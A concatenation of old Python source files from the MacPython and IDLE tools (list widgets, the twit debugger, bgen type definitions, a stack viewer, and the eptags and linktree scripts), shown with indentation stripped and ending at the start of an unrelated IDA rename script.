match_i = -1
for i in range(len(items)):
item = lower(str(items[i]))
if tag <= item < match:
match = item
match_i = i
if match_i >= 0:
return match_i
else:
return len(items) - 1
def domenu_copy(self, *args):
sel = self.getselection()
selitems = []
for i in sel:
selitems.append(str(self.items[i]))
text = string.join(selitems, '\r')
if text:
Scrap.ZeroScrap()
Scrap.PutScrap('TEXT', text)
def can_copy(self, *args):
return len(self.getselection()) <> 0
def domenu_selectall(self, *args):
self.selectall()
def selectall(self):
self.setselection(range(len(self.items)))
self._list.LAutoScroll()
self.click((-1, -1), 0)
def getselection(self):
if not self._parent or not self._list:
if hasattr(self, "_sel"):
return self._sel
return []
items = []
point = (0,0)
while 1:
ok, point = self._list.LGetSelect(1, point)
if not ok:
break
items.append(point[1])
point = point[0], point[1]+1
return items
def setselection(self, selection):
if not self._parent or not self._list:
self._sel = selection
return
set_sel = self._list.LSetSelect
for i in range(len(self.items)):
if i in selection:
set_sel(1, (0, i))
else:
set_sel(0, (0, i))
self._list.LAutoScroll()
def getselectedobjects(self):
sel = self.getselection()
objects = []
for i in sel:
objects.append(self.items[i])
return objects
def setselectedobjects(self, objects):
sel = []
for o in objects:
try:
sel.append(self.items.index(o))
except:
pass
self.setselection(sel)
def gettopcell(self):
l, t, r, b = self._bounds
t = t + 1
cl, ct, cr, cb = self._list.LRect((0, 0))
cellheight = cb - ct
return (t - ct) / cellheight
def settopcell(self, topcell):
top = self.gettopcell()
diff = topcell - top
self._list.LScroll(0, diff)
def draw(self, visRgn = None):
if self._visible:
if not visRgn:
visRgn = self._parentwindow.wid.GetWindowPort().visRgn
self._list.LUpdate(visRgn)
Qd.FrameRect(self._bounds)
if self._selected and self._activated:
self.drawselframe(1)
def select(self, onoff, isclick = 0):
if Wbase.SelectableWidget.select(self, onoff):
return
self.SetPort()
self.drawselframe(onoff)
def activate(self, onoff):
self._activated = onoff
if self._visible:
self._list.LActivate(onoff)
if self._selected:
self.drawselframe(onoff)
def get(self):
return self.items
def itemrepr(self, item):
return str(item)[:255]
def __getitem__(self, index):
return self.items[index]
def __setitem__(self, index, item):
if self._parent and self._list:
self._list.LSetCell(self.itemrepr(item), (0, index))
self.items[index] = item
def __delitem__(self, index):
if self._parent and self._list:
self._list.LDelRow(1, index)
del self.items[index]
def __getslice__(self, a, b):
return self.items[a:b]
def __delslice__(self, a, b):
if b-a:
if self._parent and self._list:
self._list.LDelRow(b-a, a)
del self.items[a:b]
def __setslice__(self, a, b, items):
if self._parent and self._list:
l = len(items)
the_list = self._list
self.setdrawingmode(0)
if b-a:
if b > len(self.items):
# fix for new 1.5 "feature" where b is sys.maxint instead of len(self)...
# LDelRow doesn't like maxint.
b = len(self.items)
the_list.LDelRow(b-a, a)
the_list.LAddRow(l, a)
self_itemrepr = self.itemrepr
set_cell = the_list.LSetCell
for i in range(len(items)):
set_cell(self_itemrepr(items[i]), (0, i + a))
self.items[a:b] = items
self.setdrawingmode(1)
else:
self.items[a:b] = items
def __len__(self):
return len(self.items)
def append(self, item):
if self._parent and self._list:
index = len(self.items)
self._list.LAddRow(1, index)
self._list.LSetCell(self.itemrepr(item), (0, index))
self.items.append(item)
def remove(self, item):
index = self.items.index(item)
self.__delitem__(index)
def index(self, item):
return self.items.index(item)
def insert(self, index, item):
if index < 0:
index = 0
if self._parent and self._list:
self._list.LAddRow(1, index)
self._list.LSetCell(self.itemrepr(item), (0, index))
self.items.insert(index, item)
def setdrawingmode(self, onoff):
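# Nested drawing-mode bracket: drawing is re-enabled (and the list
# redrawn) only when the outermost setdrawingmode(1) balances the
# matching setdrawingmode(0).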
if onoff:
self.drawingmode = self.drawingmode - 1
if self.drawingmode == 0 and self._list is not None:
self._list.LSetDrawingMode(1)
if self._visible:
bounds = l, t, r, b = Qd.InsetRect(self._bounds, 1, 1)
cl, ct, cr, cb = self._list.LRect((0, len(self.items)-1))
if cb < b:
self.SetPort()
Qd.EraseRect((l, cb, cr, b))
self._list.LUpdate(self._parentwindow.wid.GetWindowPort().visRgn)
Win.ValidRect(bounds)
else:
if self.drawingmode == 0 and self._list is not None:
self._list.LSetDrawingMode(0)
self.drawingmode = self.drawingmode + 1
class TwoLineList(List):
LDEF_ID = 468
def createlist(self):
import List
self._calcbounds()
self.SetPort()
rect = self._bounds
rect = rect[0]+1, rect[1]+1, rect[2]-16, rect[3]-1
self._list = List.LNew(rect, (0, 0, 1, 0), (0, 28), self.LDEF_ID, self._parentwindow.wid,
0, 1, 0, 1)
self.set(self.items)
class ResultsWindow:
"""Simple results window. The user cannot make this window go away completely:
closing it will just hide it. It will remain in the windows list. The owner of this window
should call the done() method to indicate it's done with it.
"""
def __init__(self, possize=None, title="Results", callback=None):
import W
if possize is None:
possize = (500, 200)
self.w = W.Window(possize, title, minsize=(200, 100))
self.w.results = W.TwoLineList((-1, -1, 1, -14), callback=callback)
self.w.bind("<close>", self.hide)
self.w.open()
self._done = 0
def done(self):
self._done = 1
if not self.w.isvisible():
self.w.close()
def hide(self):
if not self._done:
self.w.show(0)
return -1
def append(self, msg):
if not self.w.isvisible():
self.w.show(1)
self.w.select()
msg = string.replace(msg, '\n', '\r')
self.w.results.append(msg)
self.w.results.setselection([len(self.w.results)-1])
def __getattr__(self, attr):
return getattr(self.w.results, attr)
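# A minimal usage sketch (hypothetical caller, not part of this module):
#
#   results = ResultsWindow(title="Search hits")
#   for hit in compute_hits():        # compute_hits() is a placeholder
#       results.append(str(hit))
#   results.done()  # the window can go away once the user dismisses it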
class MultiList(List):
"""XXX Experimantal!!!"""
def setitems(self, items):
self.items = items
if not self._parent or not self._list:
return
self._list.LDelRow(0, 1)
self.setdrawingmode(0)
self._list.LAddRow(len(self.items), 0)
self_itemrepr = self.itemrepr
set_cell = self._list.LSetCell
for i in range(len(items)):
row = items[i]
for j in range(len(row)):
item = row[j]
set_cell(self_itemrepr(item), (j, i))
self.setdrawingmode(1)
def getselection(self):
if not self._parent or not self._list:
if hasattr(self, "_sel"):
return self._sel
return []
items = []
point = (0,0)
while 1:
ok, point = self._list.LGetSelect(1, point)
if not ok:
break
items.append(point[1])
point = point[0], point[1]+1
return items
def setselection(self, selection):
if not self._parent or not self._list:
self._sel = selection
return
set_sel = self._list.LSetSelect
for i in range(len(self.items)):
if i in selection:
set_sel(1, (0, i))
else:
set_sel(0, (0, i))
#self._list.LAutoScroll()
```
#### File: Tools/IDE/W.py
```python
__version__ = "0.3"
from Wbase import *
from Wcontrols import *
from Wtext import *
from Wlists import *
from Wwindows import *
from Wmenus import *
_application = None
_signature = None
AlertError = 'AlertError'
def setapplication(app, sig):
global _application, _signature
_application = app
_signature = sig
def getapplication():
if _application is None:
raise WidgetsError, 'W not properly initialized: unknown Application'
return _application
def Message(text):
import EasyDialogs, Qd, string
Qd.InitCursor()
text = string.replace(text, "\n", "\r")
if not text:
text = '<Alert text not specified>'
EasyDialogs.Message(text)
```
#### File: Tools/macfreeze/macgen_info.py
```python
def generate(output, module_dict):
for name in module_dict.keys():
print 'Include %-20s\t'%name,
module = module_dict[name]
print module.gettype(), '\t', `module`
return 0
```
#### File: Tools/macfreeze/macgen_rsrc.py
```python
import EasyDialogs
import py_resource
import Res
import sys
def generate(output, module_dict, debug=0, preload=1):
fsid = py_resource.create(output)
for name, module in module_dict.items():
mtype = module.gettype()
if mtype not in ['module', 'package']:
continue
location = module.__file__
if location[-4:] == '.pyc':
# Attempt corresponding .py
location = location[:-1]
if location[-3:] != '.py':
print '*** skipping', location
continue
id, name = py_resource.frompyfile(location, name, preload=preload,
ispackage=mtype=='package')
if debug > 0:
print 'PYC resource %5d\t%s\t%s'%(id, name, location)
Res.CloseResFile(fsid)
def warnings(module_dict):
problems = 0
for name, module in module_dict.items():
if module.gettype() not in ('builtin', 'module', 'package'):
problems = problems + 1
print 'Warning: %s not included: %s %s'%(name, module.gettype(), module)
return problems
```
#### File: Tools/twit/mactwit_app.py
```python
import FrameWork
import MiniAEFrame
import EasyDialogs
import AE
import AppleEvents
import Res
import sys
import Qd
import Evt
import Events
import Dlg
import Win
import Menu
import TwitCore
import mactwit_mod
import mactwit_stack
import mactwit_browser
import mactwit_edit
import macfs
import string
# Resource-id (for checking existence)
ID_MODULES=500
ID_ABOUT=502
_arrow = Qd.qd.arrow
_watch = Qd.GetCursor(4).data
class Twit(FrameWork.Application, TwitCore.Application, MiniAEFrame.AEServer):
"""The twit main class - mac-dependent part"""
def __init__(self, sessiontype, arg=None):
# First init menus, etc.
self.app_menu_bar = Menu.GetMenuBar()
FrameWork.Application.__init__(self)
MiniAEFrame.AEServer.__init__(self)
AE.AESetInteractionAllowed(AppleEvents.kAEInteractWithAll)
self.installaehandler('aevt', 'odoc', self.ae_open_doc)
self.installaehandler('aevt', 'quit', self.do_quit)
self.installaehandler('pyth', 'EXEC', self.do_bbpyexec) # BBpy execute event
self.dbg_menu_bar = Menu.GetMenuBar()
self.setstate(sessiontype)
self._quitting = 0
self.real_quit = 0
self.window_aware = 1
# Next create our dialogs
self.mi_init(sessiontype, arg)
while 1:
if self.real_quit:
break
if self.initial_cmd:
self.to_debugger() # Will get to mainloop via debugger
else:
self.one_mainloop() # Else do it ourselves.
def switch_to_app(self):
if not self.window_aware:
return
self.dbg_menu_bar = Menu.GetMenuBar()
Menu.SetMenuBar(self.app_menu_bar)
Menu.DrawMenuBar()
def switch_to_dbg(self):
if not self.window_aware:
return
self.app_menu_bar = Menu.GetMenuBar()
Menu.SetMenuBar(self.dbg_menu_bar)
Menu.DrawMenuBar()
self.run_dialog.force_redraw()
if self.module_dialog:
self.module_dialog.force_redraw()
def makeusermenus(self):
self.filemenu = m = FrameWork.Menu(self.menubar, "Debug")
self._openitem = FrameWork.MenuItem(m, "Run File...", "O", self.do_open)
self._runitem = FrameWork.MenuItem(m, "Run String...", "R", self.do_run)
FrameWork.Separator(m)
self._awareitem = FrameWork.MenuItem(m, "Window-aware", "", self.do_aware)
self._awareitem.check(1)
FrameWork.Separator(m)
self._quititem = FrameWork.MenuItem(m, "Quit", "Q", self.do_quit)
self.controlmenu = m = FrameWork.Menu(self.menubar, "Control")
self._stepitem = FrameWork.MenuItem(m, "Step Next", "N", self.do_step)
self._stepinitem = FrameWork.MenuItem(m, "Step In", "S", self.do_stepin)
self._stepoutitem = FrameWork.MenuItem(m, "Step Out", "U", self.do_stepout)
self._continueitem = FrameWork.MenuItem(m, "Continue", "G", self.do_continue)
FrameWork.Separator(m)
self._killitem = FrameWork.MenuItem(m, "Kill", "K", self.do_kill)
def setstate(self, state):
self.state = state
if state == 'run':
self._stepitem.enable(1)
self._stepoutitem.enable(1)
self._stepinitem.enable(1)
self._continueitem.enable(1)
self._killitem.enable(1)
else:
self._stepitem.enable(0)
self._stepoutitem.enable(0)
self._stepinitem.enable(0)
self._continueitem.enable(0)
self._killitem.enable(0)
def asknewsession(self):
if self.state == 'none':
return 1
if EasyDialogs.AskYesNoCancel("Abort current debug session?") == 1:
self.quit_bdb()
return 1
return 0
def do_about(self, id, item, window, event):
import time
d = Dlg.GetNewDialog(ID_ABOUT, -1)
if not d:
return
w = d.GetDialogWindow()
port = w.GetWindowPort()
l, t, r, b = port.portRect
sl, st, sr, sb = Qd.qd.screenBits.bounds
x = ((sr-sl) - (r-l)) / 2
y = ((sb-st-16) - (b-t)) / 5
w.MoveWindow(x, y, 0)
w.ShowWindow()
d.DrawDialog()
tp, h, rect = d.GetDialogItem(2)
x0, y0, x1, y1 = rect
ybot = y0 + 32
rgn = Qd.NewRgn()
Qd.SetPort(d)
ok, evt = self.getevent(Events.mDownMask|Events.keyDownMask, 1)
if ok: return
(what, message, when, where, modifiers) = event
delta_t = 128
nexttime = when+delta_t
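# Scroll the credits in the about box upward, shrinking the delay
# between steps geometrically so the animation accelerates, until the
# text has scrolled past the bottom of the item rectangle.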
while ybot < y1:
# Do the animation, if it is time
if when > nexttime:
Qd.ScrollRect((x0, y0, x1, ybot), 0, 1, rgn)
y0 = y0 + 1
ybot = ybot + 1
# And update next time
delta_t = int(delta_t*0.6)-1
if delta_t < 0:
delta_t = 0
nexttime = when + delta_t
# Check for an event.
ok, evt = self.getevent(Events.mDownMask|Events.keyDownMask, 0)
if ok: return
(what, message, when, where, modifiers) = evt
while 1:
ok, evt = self.getevent(Events.mDownMask|Events.keyDownMask, -1)
if ok: return
def do_open(self, *args):
if not self.asknewsession():
return
fss, ok = macfs.StandardGetFile('TEXT')
if not ok: return
self.runfile(fss.as_pathname())
def ae_open_doc(self, object=None, **args):
if not object: return
if self.state <> 'none':
if AE.AEInteractWithUser(AppleEvents.kAEDefaultTimeout) == 0:
if not self.asknewsession():
return
if type(object) == type([]):
object = object[0]
fss, changed = object.Resolve()
self.runfile(fss.as_pathname())
def do_bbpyexec(self, object=None, NAME=None, **args):
if type(object) <> type(''):
if AE.AEInteractWithUser(AppleEvents.kAEDefaultTimeout) == 0:
EasyDialogs.Message('EXEC AppleEvent arg should be a string')
return
if self.state <> 'none':
if AE.AEInteractWithUser(AppleEvents.kAEDefaultTimeout) == 0:
if not self.asknewsession():
return
stuff = string.splitfields(object, '\r')
stuff = string.joinfields(stuff, '\n')
self.runstring(stuff)
def do_run(self, *args):
if not self.asknewsession():
return
self.run()
def do_aware(self, *args):
self.window_aware = not self.window_aware
self._awareitem.check(self.window_aware)
def do_quit(self, *args):
self._quit() # Signal FrameWork.Application to stop
self.real_quit = 1
self.quit_bdb() # Tell debugger to quit.
def do_step(self, *args):
self.run_dialog.click_step()
def do_stepin(self, *args):
self.run_dialog.click_step_in()
def do_stepout(self, *args):
self.run_dialog.click_step_out()
def do_continue(self, *args):
self.run_dialog.click_continue()
def do_kill(self, *args):
self.run_dialog.click_kill()
def exit_mainloop(self):
self._quit() # Signal FrameWork.Application to stop
self.real_quit = 0
def one_mainloop(self):
self.quitting = 0
self.mainloop()
def SetCursor(self):
Qd.SetCursor(_arrow)
def SetWatch(self):
Qd.SetCursor(_watch)
def AskString(self, *args):
return apply(EasyDialogs.AskString, args)
def Message(self, *args):
return apply(EasyDialogs.Message, args)
def new_module_browser(self, parent):
return mactwit_mod.ModuleBrowser(parent)
def new_stack_browser(self, parent):
return mactwit_stack.StackBrowser(parent)
def new_var_browser(self, parent, var):
return mactwit_browser.VarBrowser(parent).open(var)
def edit(self, file, line):
return mactwit_edit.edit(file, line)
def Initialize():
try:
# if this doesn't raise an error, we are an applet containing the
# necessary resources or we have been initialized already
# so we don't have to bother opening the resource file
dummy = Res.GetResource('DLOG', ID_MODULES)
except Res.Error:
try:
Res.OpenResFile("Twit.rsrc")
except Res.Error, arg:
EasyDialogs.Message("Cannot open Twit.rsrc: "+arg[1])
sys.exit(1)
```
#### File: Tools/twit/twit.py
```python
import os
import sys
# Add our directory to path, if needed
dirname = os.path.split(__file__)[0]
if not dirname in sys.path:
sys.path.append(dirname)
if os.name == 'mac':
import MacOS
MacOS.splash(502) # Try to show the splash screen
import mactwit_app; twit_app = mactwit_app
else:
try:
import _tkinter
have_tk = 1
except ImportError:
have_tk = 0
if have_tk:
import tktwit_app; twit_app = tktwit_app
else:
print 'Please implement machine-dependent code and try again :-)'
sys.exit(1)
import sys
def main():
twit_app.Initialize()
if os.name == 'mac':
MacOS.splash()
twit_app.Twit('none', None)
def run(statement, globals=None, locals=None):
twit_app.Initialize()
twit_app.Twit('run', (statement, globals, locals))
def post_mortem(t):
twit_app.Initialize()
twit_app.Twit('pm', t)
def pm():
post_mortem(sys.last_traceback)
if __name__ == '__main__':
main()
```
#### File: Tools/twit/twittest.py
```python
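# Deliberately buggy demo program for the twit debugger: the recursion
# eventually calls bar(0), where 10/arg raises ZeroDivisionError.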
def foo(arg1, arg2):
bar(arg1+arg2)
bar(arg1-arg2)
foo(arg1+1, arg2-1)
def bar(arg):
rv = 10/arg
print rv
foo(0,10)
```
#### File: bgen/bgen/macsupport.py
```python
from bgen import *
# Simple types
Boolean = Type("Boolean", "b")
SignedByte = Type("SignedByte", "b")
ScriptCode = Type("ScriptCode", "h")
Size = Type("Size", "l")
Style = Type("Style", "b")
StyleParameter = Type("StyleParameter", "h")
CharParameter = Type("CharParameter", "h")
TextEncoding = Type("TextEncoding", "l")
UInt8 = Type("UInt8", "b")
SInt8 = Type("SInt8", "b")
UInt16 = Type("UInt16", "h")
SInt16 = Type("SInt16", "h")
UInt32 = Type("UInt32", "l")
SInt32 = Type("SInt32", "l")
# Pascal strings
ConstStr255Param = OpaqueArrayType("Str255", "PyMac_BuildStr255", "PyMac_GetStr255")
Str255 = OpaqueArrayType("Str255", "PyMac_BuildStr255", "PyMac_GetStr255")
# File System Specifications
FSSpec_ptr = OpaqueType("FSSpec", "PyMac_BuildFSSpec", "PyMac_GetFSSpec")
# OSType and ResType: 4-byte character strings
def OSTypeType(typename):
return OpaqueByValueType(typename, "PyMac_BuildOSType", "PyMac_GetOSType")
OSType = OSTypeType("OSType")
ResType = OSTypeType("ResType")
# Version numbers
NumVersion = OpaqueByValueType("NumVersion", "PyMac_BuildNumVersion", "BUG")
# Handles (always resources in our case)
Handle = OpaqueByValueType("Handle", "ResObj")
MenuHandle = OpaqueByValueType("MenuHandle", "MenuObj")
MenuRef = MenuHandle
ControlHandle = OpaqueByValueType("ControlHandle", "CtlObj")
ControlRef = ControlHandle
# Windows and Dialogs
WindowPtr = OpaqueByValueType("WindowPtr", "WinObj")
WindowRef = WindowPtr
DialogPtr = OpaqueByValueType("DialogPtr", "DlgObj")
DialogRef = DialogPtr
ExistingWindowPtr = OpaqueByValueType("WindowPtr", "WinObj_WhichWindow", "BUG")
ExistingDialogPtr = OpaqueByValueType("DialogPtr", "WinObj_WhichWindow", "BUG")
# NULL pointer passed in as optional storage -- not present in Python version
NullStorage = FakeType("(void *)0")
# More standard datatypes
Fixed = OpaqueByValueType("Fixed", "PyMac_BuildFixed", "PyMac_GetFixed")
# Quickdraw data types
Rect = Rect_ptr = OpaqueType("Rect", "PyMac_BuildRect", "PyMac_GetRect")
Point = OpaqueByValueType("Point", "PyMac_BuildPoint", "PyMac_GetPoint")
# Event records
EventRecord = OpaqueType("EventRecord", "PyMac_BuildEventRecord", "PyMac_GetEventRecord")
EventRecord_ptr = EventRecord
# OSErr is special because it is turned into an exception
# (Could do this with less code using a variant of mkvalue("O&")?)
class OSErrType(Type):
def errorCheck(self, name):
Output("if (%s != noErr) return PyMac_Error(%s);", name, name)
self.used = 1
OSErr = OSErrType("OSErr", 'h')
OSStatus = OSErrType("OSStatus", 'l')
# Various buffer types
InBuffer = VarInputBufferType('char', 'long', 'l') # (buf, len)
InOutBuffer = HeapInputOutputBufferType('char', 'long', 'l') # (inbuf, outbuf, len)
VarInOutBuffer = VarHeapInputOutputBufferType('char', 'long', 'l') # (inbuf, outbuf, &len)
OutBuffer = HeapOutputBufferType('char', 'long', 'l') # (buf, len)
VarOutBuffer = VarHeapOutputBufferType('char', 'long', 'l') # (buf, &len)
VarVarOutBuffer = VarVarHeapOutputBufferType('char', 'long', 'l') # (buf, len, &len)
# Predefine various pieces of program text to be passed to Module() later:
# Stuff added immediately after the system include files
includestuff = """
#define SystemSevenOrLater 1
#include "macglue.h"
#include <Memory.h>
#include <Dialogs.h>
#include <Menus.h>
#include <Controls.h>
extern PyObject *ResObj_New(Handle);
extern int ResObj_Convert(PyObject *, Handle *);
extern PyObject *OptResObj_New(Handle);
extern int OptResObj_Convert(PyObject *, Handle *);
extern PyObject *WinObj_New(WindowPtr);
extern int WinObj_Convert(PyObject *, WindowPtr *);
extern PyTypeObject Window_Type;
#define WinObj_Check(x) ((x)->ob_type == &Window_Type)
extern PyObject *DlgObj_New(DialogPtr);
extern int DlgObj_Convert(PyObject *, DialogPtr *);
extern PyTypeObject Dialog_Type;
#define DlgObj_Check(x) ((x)->ob_type == &Dialog_Type)
extern PyObject *MenuObj_New(MenuHandle);
extern int MenuObj_Convert(PyObject *, MenuHandle *);
extern PyObject *CtlObj_New(ControlHandle);
extern int CtlObj_Convert(PyObject *, ControlHandle *);
extern PyObject *GrafObj_New(GrafPtr);
extern int GrafObj_Convert(PyObject *, GrafPtr *);
extern PyObject *BMObj_New(BitMapPtr);
extern int BMObj_Convert(PyObject *, BitMapPtr *);
extern PyObject *WinObj_WhichWindow(WindowPtr);
"""
# Stuff added just before the module's init function
finalstuff = """
"""
# Stuff added inside the module's init function
initstuff = """
"""
# Generator classes with a twist -- if the function returns OSErr,
# its mode is manipulated so that it turns into an exception or disappears
# (and its name is changed to _err, for documentation purposes).
# This requires that the OSErr type (defined above) has a non-trivial
# errorCheck method.
class OSErrMixIn:
"Mix-in class to treat OSErr/OSStatus return values special"
def makereturnvar(self):
if self.returntype.__class__ == OSErrType:
return Variable(self.returntype, "_err", ErrorMode)
else:
return Variable(self.returntype, "_rv", OutMode)
class OSErrFunctionGenerator(OSErrMixIn, FunctionGenerator): pass
class OSErrMethodGenerator(OSErrMixIn, MethodGenerator): pass
class MacModule(Module):
"Subclass which gets the exception initializer from macglue.c"
def exceptionInitializer(self):
return "PyMac_GetOSErrException()"
_SetOutputFileName = SetOutputFileName # Save original
def SetOutputFileName(file = None):
"Set the output file name and set its creator&type to CWIE&TEXT"
_SetOutputFileName(file)
if file:
import MacOS
MacOS.SetCreatorAndType(file, 'CWIE', 'TEXT')
```
#### File: Tools/idle/StackViewer.py
```python
import string
import sys
import os
from Tkinter import *
import linecache
from repr import Repr
from WindowList import ListedToplevel
from ScrolledList import ScrolledList
class StackBrowser:
def __init__(self, root, flist, stack=None):
self.top = top = ListedToplevel(root)
top.protocol("WM_DELETE_WINDOW", self.close)
top.bind("<Key-Escape>", self.close)
top.wm_title("Stack viewer")
top.wm_iconname("Stack")
# Create help label
self.helplabel = Label(top,
text="Click once to view variables; twice for source",
borderwidth=2, relief="groove")
self.helplabel.pack(fill="x")
#
self.sv = StackViewer(top, flist, self)
if stack is None:
stack = get_stack()
self.sv.load_stack(stack)
def close(self, event=None):
self.top.destroy()
localsframe = None
localsviewer = None
localsdict = None
globalsframe = None
globalsviewer = None
globalsdict = None
curframe = None
def show_frame(self, (frame, lineno)):
if frame is self.curframe:
return
self.curframe = None
if frame.f_globals is not self.globalsdict:
self.show_globals(frame)
self.show_locals(frame)
self.curframe = frame
def show_globals(self, frame):
title = "Global Variables"
if frame.f_globals.has_key("__name__"):
try:
name = str(frame.f_globals["__name__"]) + ""
except:
name = ""
if name:
title = title + " in module " + name
self.globalsdict = None
if self.globalsviewer:
self.globalsviewer.close()
self.globalsviewer = None
if not self.globalsframe:
self.globalsframe = Frame(self.top)
self.globalsdict = frame.f_globals
self.globalsviewer = NamespaceViewer(
self.globalsframe,
title,
self.globalsdict)
self.globalsframe.pack(fill="both", side="bottom")
def show_locals(self, frame):
self.localsdict = None
if self.localsviewer:
self.localsviewer.close()
self.localsviewer = None
if frame.f_locals is not frame.f_globals:
title = "Local Variables"
code = frame.f_code
funcname = code.co_name
if funcname not in ("?", "", None):
title = title + " in " + funcname
if not self.localsframe:
self.localsframe = Frame(self.top)
self.localsdict = frame.f_locals
self.localsviewer = NamespaceViewer(
self.localsframe,
title,
self.localsdict)
self.localsframe.pack(fill="both", side="top")
else:
if self.localsframe:
self.localsframe.forget()
class StackViewer(ScrolledList):
def __init__(self, master, flist, browser):
ScrolledList.__init__(self, master)
self.flist = flist
self.browser = browser
self.stack = []
def load_stack(self, stack, index=None):
self.stack = stack
self.clear()
## if len(stack) > 10:
## l["height"] = 10
## self.topframe.pack(expand=1)
## else:
## l["height"] = len(stack)
## self.topframe.pack(expand=0)
for i in range(len(stack)):
frame, lineno = stack[i]
try:
modname = frame.f_globals["__name__"]
except:
modname = "?"
code = frame.f_code
filename = code.co_filename
funcname = code.co_name
sourceline = linecache.getline(filename, lineno)
sourceline = string.strip(sourceline)
if funcname in ("?", "", None):
item = "%s, line %d: %s" % (modname, lineno, sourceline)
else:
item = "%s.%s(), line %d: %s" % (modname, funcname,
lineno, sourceline)
if i == index:
item = "> " + item
self.append(item)
if index is not None:
self.select(index)
def popup_event(self, event):
if self.stack:
return ScrolledList.popup_event(self, event)
def fill_menu(self):
menu = self.menu
menu.add_command(label="Go to source line",
command=self.goto_source_line)
menu.add_command(label="Show stack frame",
command=self.show_stack_frame)
def on_select(self, index):
if 0 <= index < len(self.stack):
self.browser.show_frame(self.stack[index])
def on_double(self, index):
self.show_source(index)
def goto_source_line(self):
index = self.listbox.index("active")
self.show_source(index)
def show_stack_frame(self):
index = self.listbox.index("active")
if 0 <= index < len(self.stack):
self.browser.show_frame(self.stack[index])
def show_source(self, index):
if not (0 <= index < len(self.stack)):
return
frame, lineno = self.stack[index]
code = frame.f_code
filename = code.co_filename
if os.path.isfile(filename):
edit = self.flist.open(filename)
if edit:
edit.gotoline(lineno)
def get_stack(t=None, f=None):
if t is None:
t = sys.last_traceback
stack = []
if t and t.tb_frame is f:
t = t.tb_next
while f is not None:
stack.append((f, f.f_lineno))
f = f.f_back
stack.reverse()
while t is not None:
stack.append((t.tb_frame, t.tb_lineno))
t = t.tb_next
return stack
def getexception(type=None, value=None):
if type is None:
type = sys.last_type
value = sys.last_value
if hasattr(type, "__name__"):
type = type.__name__
s = str(type)
if value is not None:
s = s + ": " + str(value)
return s
class NamespaceViewer:
def __init__(self, master, title, dict=None):
width = 0
height = 40
if dict:
height = 20*len(dict) # XXX 20 == observed height of Entry widget
self.master = master
self.title = title
self.repr = Repr()
self.repr.maxstring = 60
self.repr.maxother = 60
self.frame = frame = Frame(master)
self.frame.pack(expand=1, fill="both")
self.label = Label(frame, text=title, borderwidth=2, relief="groove")
self.label.pack(fill="x")
self.vbar = vbar = Scrollbar(frame, name="vbar")
vbar.pack(side="right", fill="y")
self.canvas = canvas = Canvas(frame,
height=min(300, max(40, height)),
scrollregion=(0, 0, width, height))
canvas.pack(side="left", fill="both", expand=1)
vbar["command"] = canvas.yview
canvas["yscrollcommand"] = vbar.set
self.subframe = subframe = Frame(canvas)
self.sfid = canvas.create_window(0, 0, window=subframe, anchor="nw")
self.load_dict(dict)
dict = -1
def load_dict(self, dict, force=0):
if dict is self.dict and not force:
return
subframe = self.subframe
frame = self.frame
for c in subframe.children.values():
c.destroy()
self.dict = None
if not dict:
l = Label(subframe, text="None")
l.grid(row=0, column=0)
else:
names = dict.keys()
names.sort()
row = 0
for name in names:
value = dict[name]
svalue = self.repr.repr(value) # repr(value)
l = Label(subframe, text=name)
l.grid(row=row, column=0, sticky="nw")
## l = Label(subframe, text=svalue, justify="l", wraplength=300)
l = Entry(subframe, width=0, borderwidth=0)
l.insert(0, svalue)
## l["state"] = "disabled"
l.grid(row=row, column=1, sticky="nw")
row = row+1
self.dict = dict
# XXX Could we use a <Configure> callback for the following?
subframe.update_idletasks() # Alas!
width = subframe.winfo_reqwidth()
height = subframe.winfo_reqheight()
canvas = self.canvas
self.canvas["scrollregion"] = (0, 0, width, height)
if height > 300:
canvas["height"] = 300
frame.pack(expand=1)
else:
canvas["height"] = height
frame.pack(expand=0)
def close(self):
self.frame.destroy()
```
#### File: Tools/scripts/eptags.py
```python
import sys
import regex
def main():
outfp = open('TAGS', 'w')
args = sys.argv[1:]
for file in args:
treat_file(file, outfp)
expr = '^[ \t]*\(def\|class\)[ \t]+\([a-zA-Z0-9_]+\)[ \t]*[:(]'
matcher = regex.compile(expr)
def treat_file(file, outfp):
try:
fp = open(file, 'r')
except:
print 'Cannot open', file
return
charno = 0
lineno = 0
tags = []
size = 0
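    # Emacs TAGS layout: each tag line is '<pattern>\x7f<lineno>,<charno>', and
    # every file gets a '\f\n<filename>,<size>' section header, written once all
    # of the file's tags have been collected (see the outfp.write calls below).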
while 1:
line = fp.readline()
if not line: break
lineno = lineno + 1
if matcher.search(line) >= 0:
(a, b), (a1, b1), (a2, b2) = matcher.regs[:3]
name = line[a2:b2]
pat = line[a:b]
tag = pat + '\177' + `lineno` + ',' + `charno` + '\n'
tags.append((name, tag))
size = size + len(tag)
charno = charno + len(line)
outfp.write('\f\n' + file + ',' + `size` + '\n')
for name, tag in tags:
outfp.write(tag)
main()
```
#### File: Tools/scripts/linktree.py
```python
import sys, os
LINK = '.LINK' # Name of special symlink at the top.
debug = 0
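# Overall scheme: mirror oldtree's directory structure under newtree, plant one
# symlink (LINK) at the top that points back at oldtree, and turn every file
# into a relative symlink that routes through that LINK entry.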
def main():
if not 3 <= len(sys.argv) <= 4:
print 'usage:', sys.argv[0], 'oldtree newtree [linkto]'
return 2
oldtree, newtree = sys.argv[1], sys.argv[2]
if len(sys.argv) > 3:
link = sys.argv[3]
link_may_fail = 1
else:
link = LINK
link_may_fail = 0
if not os.path.isdir(oldtree):
print oldtree + ': not a directory'
return 1
try:
os.mkdir(newtree, 0777)
except os.error, msg:
print newtree + ': cannot mkdir:', msg
return 1
linkname = os.path.join(newtree, link)
try:
os.symlink(os.path.join(os.pardir, oldtree), linkname)
except os.error, msg:
if not link_may_fail:
print linkname + ': cannot symlink:', msg
return 1
else:
print linkname + ': warning: cannot symlink:', msg
linknames(oldtree, newtree, link)
return 0
def linknames(old, new, link):
if debug: print 'linknames', (old, new, link)
try:
names = os.listdir(old)
except os.error, msg:
print old + ': warning: cannot listdir:', msg
return
for name in names:
if name not in (os.curdir, os.pardir):
oldname = os.path.join(old, name)
linkname = os.path.join(link, name)
newname = os.path.join(new, name)
if debug > 1: print oldname, newname, linkname
if os.path.isdir(oldname) and \
not os.path.islink(oldname):
try:
os.mkdir(newname, 0777)
ok = 1
                except os.error, msg:
print newname + \
': warning: cannot mkdir:', msg
ok = 0
if ok:
linkname = os.path.join(os.pardir,
linkname)
linknames(oldname, newname, linkname)
else:
os.symlink(linkname, newname)
sys.exit(main())
``` |
{
"source": "1byte2bytes/nx-decomp-tools",
"score": 3
} |
#### File: 1byte2bytes/nx-decomp-tools/rename_functions_in_ida.py
```python
import csv
import idc
